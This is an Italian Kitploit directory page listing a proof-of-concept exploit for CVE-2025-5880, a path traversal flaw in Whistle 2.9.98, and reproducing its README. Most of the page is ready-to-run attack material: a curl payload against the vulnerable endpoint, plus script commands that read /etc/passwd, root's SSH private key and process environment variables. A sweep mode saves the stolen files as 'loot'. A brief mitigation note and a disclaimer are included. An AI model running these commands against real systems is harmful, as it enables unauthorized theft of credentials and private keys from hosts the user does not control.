Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5880-PoC — Exploit proof-of-concept per una vulnerabilità di path traversal non autenticata in Whistle v2.9.98. | Kitploit
Strumenti/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Exploit proof-of-concept per una vulnerabilità di path traversal non autenticata in Whistle v2.9.98.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-5880 — Whistle 2.9.98 PoC di Path Traversal

Python CVE CWE License

Exploit proof-of-concept per una vulnerabilità di path traversal non autenticata in Whistle v2.9.98.


Riepilogo della vulnerabilità

CampoDettaglio
CVE IDCVE-2025-5880
CWECWE-22 (Path Traversal)
Software interessatoWhistle ≤ 2.9.98
Endpoint interessato/cgi-bin/sessions/get-temp-file
Vettore di attaccoRete — nessuna autenticazione richiesta
ImpattoLettura arbitraria di file sul filesystem host

Il parametro di query filename non viene sanificato prima di essere utilizzato per aprire un file su disco, consentendo a un attaccante di uscire dalla directory dei file temporanei prevista e leggere qualsiasi file a cui il processo Whistle ha permesso di accedere (ad es. /etc/passwd, /root/.ssh/id_rsa).


Avvio rapido

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Utilizzo

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

Esempi

root@kitploit:~
# Leggi /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# Recupera la chiave privata SSH di root
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# Leggi un percorso arbitrario
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# Scansione e salvataggio di tutti i preset
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

PoC grezzo (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Mitigazione

Aggiorna Whistle a una versione che convalidi e limiti il parametro filename alla directory dei file temporanei prevista. Applica una normalizzazione del percorso tramite allowlist (ad es. path.resolve + controllo del prefisso) lato server.


Dichiarazione di non responsabilità

Questo strumento è fornito solo per test di sicurezza autorizzati e a scopo didattico.
L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha esplicita autorizzazione è illegale e non etico.
L'autore non si assume alcuna responsabilità per un uso improprio.

Scarica lo strumento
FlagDescrizione
-u / --urlURL di base del target (es. http://192.168.1.10:8899)
-f / --filePercorso del file arbitrario da leggere
--presetScorciatoia denominata: passwd shadow hosts id_rsa …
--sweepItera automaticamente tutti i preset
-o / --outputSalva il risultato in un file
--save-dirDirectory in cui salvare il bottino da --sweep
--timeoutTimeout HTTP in secondi (default 10)